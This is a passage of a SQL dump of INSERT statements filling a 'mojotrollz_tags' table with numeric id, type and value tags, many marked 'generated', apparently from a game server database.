VALUES (10682, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10682, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10682, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10683, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10684, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10684, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10685, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10685, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10685, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10685, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10685, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10685, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10696, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10696, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10697, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10698, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10698, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10699, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10716, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10717, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10718, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10719, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10720, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10721, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10721, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10737, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10738, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10738, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10739, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10739, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10740, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10740, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10740, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10741, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10742, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10756, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10756, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10757, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10757, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10758, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10758, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10759, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10759, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10760, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10760, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10761, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10761, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10762, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10762, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10762, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10776, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10778, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10778, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10779, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10779, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10780, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10780, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10781, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10781, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10781, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10781, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10781, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10782, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10782, 1, 2, 1519, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10782, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10783, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10784, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10785, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10786, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10787, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10788, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10789, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10790, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10791, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10792, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10793, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10794, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10795, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10796, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10797, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10798, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10799, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10799, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10799, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10800, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10801, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10801, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10802, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10802, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10803, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10803, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10804, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10804, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10805, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10805, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10806, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10806, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10807, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10807, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10808, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10809, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10809, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10809, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10811, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10811, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10811, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10812, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10812, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10812, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10813, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10814, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10814, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10814, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10816, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10816, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10817, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10817, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10821, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10821, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10822, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10822, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10823, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10823, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10824, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10824, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10825, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10825, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10826, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10826, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10827, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10827, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10828, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10828, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10836, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10837, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10837, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10838, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10838, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10839, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10839, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10840, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10840, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10856, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10856, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10857, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10857, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10876, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10877, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10877, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10878, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10878, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10879, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10879, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10879, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10879, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10879, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10880, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10880, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10880, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10880, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10880, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10880, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10881, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10881, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10882, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10896, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10896, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10897, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10897, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10899, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10899, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10899, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10901, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10901, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10902, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10902, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10903, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10903, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10904, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10904, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10905, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10905, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10916, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10916, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10917, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10917, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10917, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10918, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10918, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10919, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10919, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10920, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10920, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10921, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10921, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10922, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10922, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10923, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10923, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10924, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10924, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10925, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10926, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10926, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10927, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10927, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10928, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10929, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10929, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10930, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10930, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10936, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10937, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10938, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10939, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10940, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10940, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10941, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10941, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10942, 1, 1, 369, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10942, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10943, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10944, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10945, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10946, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10947, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10948, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10949, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10950, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10951, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10952, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10953, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10954, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10955, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10956, 1, 1, 369, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10956, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10976, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10976, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10977, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` 